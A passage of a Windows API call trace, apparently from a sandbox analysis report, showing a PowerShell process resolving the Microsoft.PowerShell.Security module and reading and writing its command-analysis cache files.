	[0058.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x105, lpBuffer=0x184c18cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73
	[0058.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d400) returned 1
	[0058.422] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1"), fInfoLevelId=0x0, lpFileInformation=0x15047e32b78 | out: lpFileInformation=0x15047e32b78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296)) returned 1
	[0058.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d3c0) returned 1
	[0058.422] ReleaseMutex (hMutex=0x8b8) returned 1
	[0058.422] GetCurrentProcess () returned 0xffffffffffffffff
	[0058.422] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18d448 | out: TokenHandle=0x184c18d448*=0x8bc) returned 1
	[0058.422] GetTokenInformation (in: TokenHandle=0x8bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18d548 | out: TokenInformation=0x0, ReturnLength=0x184c18d548) returned 0
	[0058.422] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1505fc9b020
	[0058.422] GetTokenInformation (in: TokenHandle=0x8bc, TokenInformationClass=0x1, TokenInformation=0x1505fc9b020, TokenInformationLength=0x2c, ReturnLength=0x184c18d548 | out: TokenInformation=0x1505fc9b020, ReturnLength=0x184c18d548) returned 1
	[0058.422] LocalFree (hMem=0x1505fc9b020) returned 0x0
	[0058.422] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x15047e33800, cbSid=0x184c18d540 | out: pSid=0x15047e33800*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18d540) returned 1
	[0058.422] CreateMutexW (lpMutexAttributes=0x15047e33950, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000") returned 0x8c0
	[0058.423] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18d3e0*=0x8c0, lpdwindex=0x184c18d1b4 | out: lpdwindex=0x184c18d1b4) returned 0x0
	[0058.423] CoTaskMemAlloc (cb=0x218) returned 0x1505fbdd630
	[0058.423] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbdd630, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.423] CoTaskMemFree (pv=0x1505fbdd630) 
	[0058.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x105, lpBuffer=0x184c18cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73
	[0058.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d470) returned 1
	[0058.423] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1"), fInfoLevelId=0x0, lpFileInformation=0x15047e39198 | out: lpFileInformation=0x15047e39198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296)) returned 1
	[0058.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d430) returned 1
	[0058.424] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0058.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2f0) returned 1
	[0058.424] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18d3d0 | out: lpFileInformation=0x184c18d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0058.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.424] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x184c18cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6a
	[0058.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d230) returned 1
	[0058.425] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x8c4
	[0058.425] GetFileType (hFile=0x8c4) returned 0x1
	[0058.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1a0) returned 1
	[0058.425] GetFileType (hFile=0x8c4) returned 0x1
	[0058.425] ReadFile (in: hFile=0x8c4, lpBuffer=0x15047e3a790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d098, lpOverlapped=0x0 | out: lpBuffer=0x15047e3a790*, lpNumberOfBytesRead=0x184c18d098*=0x1000, lpOverlapped=0x0) returned 1
	[0058.427] ReadFile (in: hFile=0x8c4, lpBuffer=0x15047e3c504, nNumberOfBytesToRead=0x2b, lpNumberOfBytesRead=0x184c18ccc8, lpOverlapped=0x0 | out: lpBuffer=0x15047e3c504*, lpNumberOfBytesRead=0x184c18ccc8*=0x2b, lpOverlapped=0x0) returned 1
	[0058.427] ReadFile (in: hFile=0x8c4, lpBuffer=0x15047e3a790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18cd68, lpOverlapped=0x0 | out: lpBuffer=0x15047e3a790*, lpNumberOfBytesRead=0x184c18cd68*=0x1000, lpOverlapped=0x0) returned 1
	[0058.428] ReadFile (in: hFile=0x8c4, lpBuffer=0x15047e3c53c, nNumberOfBytesToRead=0x9, lpNumberOfBytesRead=0x184c18cb18, lpOverlapped=0x0 | out: lpBuffer=0x15047e3c53c*, lpNumberOfBytesRead=0x184c18cb18*=0x9, lpOverlapped=0x0) returned 1
	[0058.428] ReadFile (in: hFile=0x8c4, lpBuffer=0x15047e3a790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18cbb8, lpOverlapped=0x0 | out: lpBuffer=0x15047e3a790*, lpNumberOfBytesRead=0x184c18cbb8*=0x1000, lpOverlapped=0x0) returned 1
	[0058.429] ReadFile (in: hFile=0x8c4, lpBuffer=0x15047e3c574, nNumberOfBytesToRead=0xb, lpNumberOfBytesRead=0x184c18cd08, lpOverlapped=0x0 | out: lpBuffer=0x15047e3c574*, lpNumberOfBytesRead=0x184c18cd08*=0xb, lpOverlapped=0x0) returned 1
	[0058.429] ReadFile (in: hFile=0x8c4, lpBuffer=0x15047e3a790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18cd08, lpOverlapped=0x0 | out: lpBuffer=0x15047e3a790*, lpNumberOfBytesRead=0x184c18cd08*=0x1000, lpOverlapped=0x0) returned 1
	[0058.430] ReadFile (in: hFile=0x8c4, lpBuffer=0x15047e3a790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18cc18, lpOverlapped=0x0 | out: lpBuffer=0x15047e3a790*, lpNumberOfBytesRead=0x184c18cc18*=0xd9b, lpOverlapped=0x0) returned 1
	[0058.432] ReadFile (in: hFile=0x8c4, lpBuffer=0x15047e3a790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d068, lpOverlapped=0x0 | out: lpBuffer=0x15047e3a790*, lpNumberOfBytesRead=0x184c18d068*=0x0, lpOverlapped=0x0) returned 1
	[0058.432] CloseHandle (hObject=0x8c4) returned 1
	[0058.432] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbdc970
	[0058.432] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbdc970 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.432] CoTaskMemFree (pv=0x1505fbdc970) 
	[0058.432] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.433] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0058.433] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d370) returned 1
	[0058.433] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18d450 | out: lpFileInformation=0x184c18d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0058.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d330) returned 1
	[0058.433] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f", nBufferLength=0x105, lpBuffer=0x184c18cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f", lpFilePart=0x0) returned 0x8f
	[0058.433] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2b0) returned 1
	[0058.433] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_41c67784-5a05-4d3a-a346-47e4d3e9d32f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x8c4
	[0058.434] GetFileType (hFile=0x8c4) returned 0x1
	[0058.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0058.434] GetFileType (hFile=0x8c4) returned 0x1
	[0058.434] SetEndOfFile (hFile=0x8c4) returned 1
	[0058.436] WriteFile (in: hFile=0x8c4, lpBuffer=0x15047e48e70*, nNumberOfBytesToWrite=0x717, lpNumberOfBytesWritten=0x184c18d3c8, lpOverlapped=0x0 | out: lpBuffer=0x15047e48e70*, lpNumberOfBytesWritten=0x184c18d3c8*=0x717, lpOverlapped=0x0) returned 1
	[0058.437] CloseHandle (hObject=0x8c4) returned 1
	[0058.438] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbda110
	[0058.438] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbda110 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.438] CoTaskMemFree (pv=0x1505fbda110) 
	[0058.438] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.438] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0058.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d310) returned 1
	[0058.438] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18d3f0 | out: lpFileInformation=0x184c18d3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0058.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.438] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x184c18cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6a
	[0058.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d250) returned 1
	[0058.438] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x8c4
	[0058.438] GetFileType (hFile=0x8c4) returned 0x1
	[0058.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1c0) returned 1
	[0058.439] GetFileType (hFile=0x8c4) returned 0x1
	[0058.439] SetEndOfFile (hFile=0x8c4) returned 1
	[0058.440] WriteFile (in: hFile=0x8c4, lpBuffer=0x15047e4b860*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18cc28, lpOverlapped=0x0 | out: lpBuffer=0x15047e4b860*, lpNumberOfBytesWritten=0x184c18cc28*=0x1000, lpOverlapped=0x0) returned 1
	[0058.440] WriteFile (in: hFile=0x8c4, lpBuffer=0x15047e4b860*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18ca68, lpOverlapped=0x0 | out: lpBuffer=0x15047e4b860*, lpNumberOfBytesWritten=0x184c18ca68*=0x1000, lpOverlapped=0x0) returned 1
	[0058.441] WriteFile (in: hFile=0x8c4, lpBuffer=0x15047e4b860*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18cc28, lpOverlapped=0x0 | out: lpBuffer=0x15047e4b860*, lpNumberOfBytesWritten=0x184c18cc28*=0x1000, lpOverlapped=0x0) returned 1
	[0058.441] WriteFile (in: hFile=0x8c4, lpBuffer=0x15047e4b860*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18ca68, lpOverlapped=0x0 | out: lpBuffer=0x15047e4b860*, lpNumberOfBytesWritten=0x184c18ca68*=0x1000, lpOverlapped=0x0) returned 1
	[0058.441] WriteFile (in: hFile=0x8c4, lpBuffer=0x15047e4b860*, nNumberOfBytesToWrite=0xdda, lpNumberOfBytesWritten=0x184c18d368, lpOverlapped=0x0 | out: lpBuffer=0x15047e4b860*, lpNumberOfBytesWritten=0x184c18d368*=0xdda, lpOverlapped=0x0) returned 1
	[0058.441] CloseHandle (hObject=0x8c4) returned 1
	[0058.442] ReleaseMutex (hMutex=0x8c0) returned 1
	[0058.444] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18dab0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18dab0*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x60, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0058.445] SetEvent (hEvent=0x8b0) returned 1
	[0058.445] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18dc70*=0x8b0, lpdwindex=0x184c18da44 | out: lpdwindex=0x184c18da44) returned 0x0
	[0058.445] GetCurrentProcess () returned 0xffffffffffffffff
	[0058.446] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18def8 | out: TokenHandle=0x184c18def8*=0x8c4) returned 1
	[0058.446] GetTokenInformation (in: TokenHandle=0x8c4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18dff8 | out: TokenInformation=0x0, ReturnLength=0x184c18dff8) returned 0
	[0058.446] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1505fc9a9a0
	[0058.446] GetTokenInformation (in: TokenHandle=0x8c4, TokenInformationClass=0x1, TokenInformation=0x1505fc9a9a0, TokenInformationLength=0x2c, ReturnLength=0x184c18dff8 | out: TokenInformation=0x1505fc9a9a0, ReturnLength=0x184c18dff8) returned 1
	[0058.446] LocalFree (hMem=0x1505fc9a9a0) returned 0x0
	[0058.446] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x15047e5f2e0, cbSid=0x184c18dff0 | out: pSid=0x15047e5f2e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18dff0) returned 1
	[0058.446] CreateMutexW (lpMutexAttributes=0x15047e5f430, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000") returned 0x8c8
	[0058.446] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18de90*=0x8c8, lpdwindex=0x184c18dc64 | out: lpdwindex=0x184c18dc64) returned 0x0
	[0058.446] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0058.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18de10) returned 1
	[0058.446] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18def0 | out: lpFileInformation=0x184c18def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0058.446] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18ddd0) returned 1
	[0058.446] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x184c18d870, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6a
	[0058.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd50) returned 1
	[0058.446] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x8cc
	[0058.447] GetFileType (hFile=0x8cc) returned 0x1
	[0058.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dcc0) returned 1
	[0058.447] GetFileType (hFile=0x8cc) returned 0x1
	[0058.447] ReadFile (in: hFile=0x8cc, lpBuffer=0x15047e604b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbb8, lpOverlapped=0x0 | out: lpBuffer=0x15047e604b8*, lpNumberOfBytesRead=0x184c18dbb8*=0x1000, lpOverlapped=0x0) returned 1
	[0058.447] ReadFile (in: hFile=0x8cc, lpBuffer=0x15047e6222c, nNumberOfBytesToRead=0x2b, lpNumberOfBytesRead=0x184c18d7e8, lpOverlapped=0x0 | out: lpBuffer=0x15047e6222c*, lpNumberOfBytesRead=0x184c18d7e8*=0x2b, lpOverlapped=0x0) returned 1
	[0058.447] ReadFile (in: hFile=0x8cc, lpBuffer=0x15047e604b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d888, lpOverlapped=0x0 | out: lpBuffer=0x15047e604b8*, lpNumberOfBytesRead=0x184c18d888*=0x1000, lpOverlapped=0x0) returned 1
	[0058.448] ReadFile (in: hFile=0x8cc, lpBuffer=0x15047e62264, nNumberOfBytesToRead=0x9, lpNumberOfBytesRead=0x184c18d638, lpOverlapped=0x0 | out: lpBuffer=0x15047e62264*, lpNumberOfBytesRead=0x184c18d638*=0x9, lpOverlapped=0x0) returned 1
	[0058.448] ReadFile (in: hFile=0x8cc, lpBuffer=0x15047e604b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d6d8, lpOverlapped=0x0 | out: lpBuffer=0x15047e604b8*, lpNumberOfBytesRead=0x184c18d6d8*=0x1000, lpOverlapped=0x0) returned 1
	[0058.448] ReadFile (in: hFile=0x8cc, lpBuffer=0x15047e6229c, nNumberOfBytesToRead=0xb, lpNumberOfBytesRead=0x184c18d828, lpOverlapped=0x0 | out: lpBuffer=0x15047e6229c*, lpNumberOfBytesRead=0x184c18d828*=0xb, lpOverlapped=0x0) returned 1
	[0058.448] ReadFile (in: hFile=0x8cc, lpBuffer=0x15047e604b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d828, lpOverlapped=0x0 | out: lpBuffer=0x15047e604b8*, lpNumberOfBytesRead=0x184c18d828*=0x1000, lpOverlapped=0x0) returned 1
	[0058.448] ReadFile (in: hFile=0x8cc, lpBuffer=0x15047e604b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d738, lpOverlapped=0x0 | out: lpBuffer=0x15047e604b8*, lpNumberOfBytesRead=0x184c18d738*=0xd9b, lpOverlapped=0x0) returned 1
	[0058.448] ReadFile (in: hFile=0x8cc, lpBuffer=0x15047e604b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18db88, lpOverlapped=0x0 | out: lpBuffer=0x15047e604b8*, lpNumberOfBytesRead=0x184c18db88*=0x0, lpOverlapped=0x0) returned 1
	[0058.448] CloseHandle (hObject=0x8cc) returned 1
	[0058.449] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x105, lpBuffer=0x184c18db60, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73
	[0058.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfe0) returned 1
	[0058.449] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1"), fInfoLevelId=0x0, lpFileInformation=0x15047e6d648 | out: lpFileInformation=0x15047e6d648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296)) returned 1
	[0058.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfa0) returned 1
